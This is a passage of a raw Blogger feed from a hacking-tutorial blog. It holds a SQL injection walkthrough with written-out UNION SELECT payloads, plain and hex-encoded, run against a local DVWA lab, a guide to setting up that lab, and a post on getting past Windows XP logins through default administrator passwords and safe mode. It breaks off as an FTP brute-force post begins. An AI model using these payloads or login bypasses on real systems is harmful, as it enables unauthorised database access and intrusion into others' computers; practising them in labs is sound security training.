&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGy1PNGgJ_vCeblHeTXOrId7ULlUmpKmgMLq_b59KQVx6NckGiHMdN5EboyFFeqd0Nl7DI5prGbC_bfgBJTfJbO3GJxP3zi66cscr9X4HruXsI8jB5AC_QdyXtlTthvlysrat0SN6LI_R6/s1600/1.png&quot;&gt;&lt;img alt=&quot; SQL Injection with HTML Tags &quot; border=&quot;0&quot; height=&quot;70&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGy1PNGgJ_vCeblHeTXOrId7ULlUmpKmgMLq_b59KQVx6NckGiHMdN5EboyFFeqd0Nl7DI5prGbC_bfgBJTfJbO3GJxP3zi66cscr9X4HruXsI8jB5AC_QdyXtlTthvlysrat0SN6LI_R6/s280/1.png&quot; title=&quot; SQL Injection with HTML Tags &quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
Now the 1and 2 columns appeared&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Then&lt;br /&gt;Get the basic info column.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39;
 UNION SELECT 
CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--+&amp;amp;Submit=Submit#&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
So the 1 and 2 column appeared.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Now, it is time&lt;/b&gt;&lt;br /&gt;
Lets add now the HTML tags. Follow the query. &lt;br /&gt;
&quot;Dont worry, if you find hard to get this, there&#39;s a video tutorial at the end of this tutorial&quot;&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;background-color: #cccccc;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39; UNI&lt;span&gt;&lt;/span&gt;ON SELECT group_concat(0x&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: blue;&quot;&gt;Injected by Sp4nkwires&lt;/span&gt;,0x&lt;br /&gt;&lt;span style=&quot;color: blue; font-size: large;&quot;&gt;,user(),0x&lt;/span&gt;,0x&lt;br /&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;,database(),0x&lt;/span&gt;,0x&lt;span style=&quot;color: blue; font-size: large;&quot;&gt;,version(),0x&lt;/span&gt;),2--+&amp;amp;Submit=Submit#&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUqgxOt1UgfJUZN1YwsEkZbZ5Rxrh-nAVfFgnRyfS_aeS3e2mldcs7SAxzrKAzZSnhfQsfg_XM61JIbpvLUp62ML7pWvERR6NkptOhwBbLiAiECsgTQDoHhPsZry5d27AK7JbT8_n-g_5-/s1600/2.png&quot;&gt;&lt;img alt=&quot; SQL Injection with HTML Tags &quot; border=&quot;0&quot; height=&quot;98&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUqgxOt1UgfJUZN1YwsEkZbZ5Rxrh-nAVfFgnRyfS_aeS3e2mldcs7SAxzrKAzZSnhfQsfg_XM61JIbpvLUp62ML7pWvERR6NkptOhwBbLiAiECsgTQDoHhPsZry5d27AK7JbT8_n-g_5-/s280/2.png&quot; title=&quot; SQL Injection with HTML Tags &quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now&lt;br /&gt;
My HTML Syntax before converting to HEX (Just to show you guys what I&#39;m doing, It will not work You have to Convert it to HEX)&lt;br /&gt;
&lt;br /&gt;
After Converting to hex&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39; UNION SELECT group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e,version(),0x3c2f666f6e743e),2--+&amp;amp;Submit=Submit#&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now, you can Modify you html tags and add more content.. like this.&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: blue;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39;
 UNION SELECT group_concat(0x&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: green; font-size: x-large;&quot;&gt;Injected by 
Sp4nkwires&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;/div&gt;
,0x&lt;br /&gt;&lt;span style=&quot;color: blue; font-size: large;&quot;&gt;Current 
User::,user(),0x&lt;/span&gt;,0x&lt;br /&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;Current 
Database::,database(),0x&lt;/span&gt;,0x&lt;br /&gt;&lt;span style=&quot;color: blue; font-size: large;&quot;&gt;MySQL 
Version::,version(),0x&lt;/span&gt;),2--+&amp;amp;Submit=Submit#
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWNMS38ITNMtCxHRltaA3pqe3H3BkgsFXFgP5-UYbwh05YjYErcC-cQIjXVLaDc-AfcmmkEZUpy5B9k0vWDLxxLt1mcrNZCKs4xieWvNeDc4hZDx5cIqhQLBGEtNsvHTU56DyK2N2Ye3RJ/s1600/3.png&quot;&gt;&lt;img alt=&quot; SQL Injection with HTML Tags &quot; border=&quot;0&quot; height=&quot;98&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWNMS38ITNMtCxHRltaA3pqe3H3BkgsFXFgP5-UYbwh05YjYErcC-cQIjXVLaDc-AfcmmkEZUpy5B9k0vWDLxxLt1mcrNZCKs4xieWvNeDc4hZDx5cIqhQLBGEtNsvHTU56DyK2N2Ye3RJ/s280/3.png&quot; title=&quot; SQL Injection with HTML Tags &quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
After Hexing&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;span style=&quot;color: magenta;&quot;&gt;http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=sp4nkwires&#39;
 UNION SELECT 
group_concat(0x3c62723e3c62723e3c623e3c666f6e742073697a653d22362220636f6c6f723d22677265656e223e496e6a6563746564206279205370346e6b77697265733c2f623e3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e43757272656e7420557365723a3a,user(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22726564223e43757272656e742044617461626173653a3a,database(),0x3c2f666f6e743e,0x3c62723e3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e4d7953514c2056657273696f6e3a3a,version(),0x3c2f666f6e743e),2--+&amp;amp;Submit=Submit#&lt;/span&gt;&lt;/blockquote&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/343005356574657038/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/HTMLTags.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/343005356574657038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/343005356574657038'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/HTMLTags.html' title=' SQL Injection With HTML Tags - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjVR_wfHFpIzi9UC_Zb05wHFpmepMqc2Hnh35XB2HvQ1ZCIfreDs3uqQ4xwzS-V2aRDhO_mtTODxJx_Xt32fvqlOlQIsj8sjbEks-Kx1GyWfdkUKscrsrLk3qyfz2uo3AdtbXy8xsIy4n/s72-c/Output+file.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-8757927927897371245</id><published>2014-03-16T06:35:00.000+05:00</published><updated>2014-03-16T06:35:11.875+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Penetration Test"/><title type='text'> How To Setup Penetration Testing LAB With DVWA - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;post-title entry-title&quot; itemprop=&quot;name headline&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ4xwy0RI6SVerno-uVg65ctAXuHWp3rqNCwqwWTsq7ofuZwtfBrYvVNjhkvyeX_9qWfmGMqM8T5kGBLN_w9NltBuCVeMmwN5E_eNoyg9CpHskczooexNXE3PWALXN3UK3hZfL48ml-lQw/s1600/cc.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;235&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ4xwy0RI6SVerno-uVg65ctAXuHWp3rqNCwqwWTsq7ofuZwtfBrYvVNjhkvyeX_9qWfmGMqM8T5kGBLN_w9NltBuCVeMmwN5E_eNoyg9CpHskczooexNXE3PWALXN3UK3hZfL48ml-lQw/s400/cc.png&quot; width=&quot;400&quot; /&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Good day friends, last time i posted a guide on how to xss 
websites, the filters and evations. Since finding hard in finding 
vulnerables sites for making tutorials, now i will guide you on how to 
to make or setup a pentesting lab with &lt;b&gt;DVWA(Damn Vulnerable Web Application)&lt;/b&gt;.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;b&gt;PentesterLab&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; PentesterLab provides vulnerable systems that can be used to 
test and understand vulnerabilities.Mostly White hat hackers or IT 
Security Team create a Penetration lab to practice their hacking tools, 
tricks and even to prevent hacking. Even beginner hacker also want to 
learn hacking skills like SQL Injection, XSS, CSRF attack etc, this all 
hacking tricks require a vulnerable website to Explode the Vulnerability
 and to learn hacking skills.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DVWA(Damn Vulnerable Web Application)&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is 
damn vulnerable. Its main goals are to be an aid for security 
professionals to test their skills and tools in a legal environment, 
help web developers better understand the processes of securing web 
applications and aid teachers/students to teach/learn web application 
security in a class room environment.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How to Install DVWA on Windows Platform &lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Setting up DVWA pentesting lab on Windows system is very easy.&lt;br /&gt;
just follow the steps given below.&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Download &lt;a href=&quot;https://github.com/RandomStorm/DVWA/archive/v1.0.8.zip&quot; target=&quot;_blank&quot;&gt;DVWA (Damn Vulnerable Web Application)&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Download &lt;a href=&quot;http://www.apachefriends.org/en/xampp-windows.html&quot; target=&quot;_blank&quot;&gt;XAMPP server&lt;/a&gt; for Windows.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Install Xampp server on Windows&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Extract all files from DVWA to desktop&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Copy entire folder &quot;DVWA&quot; to &quot;C:\xampp\htdocs&quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now Start XAMPP Control Panel - Start [Apache] and [MySQL]&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqtotXjpVKINXJPFZw-DTzrxnYS8H3OW1UJjj_8u85rnnYu5t1hrUcEJyqyvomKYlnOlOY5TzByzvHaHFtFSLZAgLtK80dPVN7Fv-txnMcAU5p8TZD388MyOKxvlWvl-iE408QdfnoPx-/s1600/3.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; border=&quot;0&quot; height=&quot;50&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaqtotXjpVKINXJPFZw-DTzrxnYS8H3OW1UJjj_8u85rnnYu5t1hrUcEJyqyvomKYlnOlOY5TzByzvHaHFtFSLZAgLtK80dPVN7Fv-txnMcAU5p8TZD388MyOKxvlWvl-iE408QdfnoPx-/s1600/3.png&quot; title=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; width=&quot;400&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3VIq7y-vLcQxarE4D60z8DCeWbPPUVKualLVz8woIfGvai0PyjcG4pU-QCxW1407lP14AR8hz8gYzfGIgpVNra7jZUglz__3gc8mobUNNhFKxd7YO3z8eubcYS5ka7RNp4SkgdGH8Qd5_/s1600/1.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; border=&quot;0&quot; height=&quot;261&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3VIq7y-vLcQxarE4D60z8DCeWbPPUVKualLVz8woIfGvai0PyjcG4pU-QCxW1407lP14AR8hz8gYzfGIgpVNra7jZUglz__3gc8mobUNNhFKxd7YO3z8eubcYS5ka7RNp4SkgdGH8Qd5_/s400/1.png&quot; title=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrkj2w84L3VcKnMbX8borAAm9Rwz6hwQqUCEHSSl147uaBlSIUxGOfnMLYPE0AZ_ElnLjWlaije-_WygUVsjf9GiLkFXMfhbwVziaKKDUTXBR7Ya6gZcuEHbtQSayYPNxhkiGFi-uDZz6O/s1600/3.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; border=&quot;0&quot; height=&quot;223&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrkj2w84L3VcKnMbX8borAAm9Rwz6hwQqUCEHSSl147uaBlSIUxGOfnMLYPE0AZ_ElnLjWlaije-_WygUVsjf9GiLkFXMfhbwVziaKKDUTXBR7Ya6gZcuEHbtQSayYPNxhkiGFi-uDZz6O/s1600/3.png&quot; title=&quot; How To Setup Penetration Testing LAB wWth DVWA - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Now Just Open your Browser &amp;amp; type 127.0.0.1 or http://localhost&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Hit Enter&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Choose DVWA folder &amp;amp; You&#39;ll get started with Login page. &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Username : admin Password : password&lt;/li&gt;
&lt;/ul&gt;
Finally you&#39;re done. Now practice, learn, create, pentest, and research.. 
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/8757927927897371245/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/PenetrationTestingLAB-WithDVWA.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/8757927927897371245'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/8757927927897371245'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/PenetrationTestingLAB-WithDVWA.html' title=' How To Setup Penetration Testing LAB With DVWA - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ4xwy0RI6SVerno-uVg65ctAXuHWp3rqNCwqwWTsq7ofuZwtfBrYvVNjhkvyeX_9qWfmGMqM8T5kGBLN_w9NltBuCVeMmwN5E_eNoyg9CpHskczooexNXE3PWALXN3UK3hZfL48ml-lQw/s72-c/cc.png" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-7818871927382074618</id><published>2014-03-15T21:45:00.001+05:00</published><updated>2014-03-15T21:45:23.294+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Blogger-Template"/><title type='text'>Premium Responive Blogger Template Free Download - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; height=&quot;251&quot; src=&quot;http://bloggeritems.com/wp-content/uploads/2013/03/fully_responsive.png&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;Download These free Responsive Blogger templates..&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;&lt;a href=&quot;https://www.mediafire.com/folder/1hld6dsb7xg8s/Premium_Blogger_Templates_%28by_Sp4nkwires_%7C_Sp4nksta%29&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Click Here For Free Download&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/7818871927382074618/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/PremiumResponive.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/7818871927382074618'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/7818871927382074618'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/PremiumResponive.html' title='Premium Responive Blogger Template Free Download - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-2417658804447144292</id><published>2014-03-15T21:34:00.000+05:00</published><updated>2014-03-15T21:34:03.334+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'>How To Bypass Windows XP Login Passwords From Scratch - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
   &lt;/div&gt;
&lt;div class=&quot;post_body&quot; id=&quot;pid_86&quot; style=&quot;text-align: center;&quot;&gt;
    &lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: Impact;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;post_body&quot; id=&quot;pid_86&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: Impact;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;post_body&quot; id=&quot;pid_86&quot; style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: Impact;&quot;&gt;Step 1: The golden disclaimer&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
First, the standard disclaimer that goes with any good Instructable: 
This is to be used for instructional purposes only, and I am not liable 
for any damage or destruction to you or your computer that may occur 
from attempting this Instructable. In other words, if you delete your 
registry or mess with a school computer and get arrested, it&#39;s not my 
fault. And don&#39;t use this to get into someone else&#39;s computer 
either.*cough*&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Step 2: The easy part&lt;/span&gt;&lt;br /&gt;
&lt;img alt=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; border=&quot;0&quot; height=&quot;254&quot; src=&quot;http://cdn.instructables.com/F9X/2SIG/F8RP7YU2/F9X2SIGF8RP7YU2.LARGE.jpg&quot; title=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
Ok, now to start.&lt;br /&gt;
If you have a login page like the one in the intro, go to step 2. If you
 have a login page like this one, it should be relatively easy to get 
into. Unless the default administrator account has been changed, all you
 have to do is type &quot;Administrator&quot; or &quot;administrator&quot; as the user name 
and the password will be either blank or &quot;password&quot;. Then press &quot;OK&quot; and
 you should be in.&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Step 3: The nastier part&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;post_body&quot; id=&quot;pid_86&quot; style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;
&lt;img alt=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; border=&quot;0&quot; height=&quot;254&quot; src=&quot;http://cdn.instructables.com/FDK/ZRLL/F8RP7YUC/FDKZRLLF8RP7YUC.LARGE.jpg&quot; title=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
If you have a fancy windows login page, things are a little more 
annoying. First, click &quot;shut down&quot; to shut down the computer. Then turn 
it back on. As soon as the screen turns on, press and hold F8. After 
about 10 seconds, a boot options menu will pop up. &lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;Step 4: Safe mode&lt;/span&gt;&lt;br /&gt;
&lt;img alt=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; border=&quot;0&quot; height=&quot;293&quot; src=&quot;http://cdn.instructables.com/FIJ/IDJC/F8RP7YVH/FIJIDJCF8RP7YVH.LARGE.jpg&quot; title=&quot;How To Bypass Windows XP Login Passwords From Scratch - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;br /&gt;
Now, in the menu, which should look like the picture below, select safe 
mode and press enter. It will show a whole bunch of gobbleygook for 
quite a while, (which you don&#39;t need to know anything about)and then it 
will bring you to the login page. This time though, there should be an 
account named &quot;administrator&quot;. Click it, and either type &quot;password&quot; or 
nothing, whichever one works. If you don&#39;t get in after that, you&#39;re 
bummed
   &lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/2417658804447144292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/BypassWindowsXPLoginPassword.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/2417658804447144292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/2417658804447144292'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/BypassWindowsXPLoginPassword.html' title='How To Bypass Windows XP Login Passwords From Scratch - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-223961266528358915</id><published>2014-03-15T21:23:00.000+05:00</published><updated>2014-03-15T21:23:11.871+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Brute Force"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="PHP"/><title type='text'>FTP Brute Force PHP Script - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;code&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: orange;&quot;&gt;&amp;nbsp;Hello Friends&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
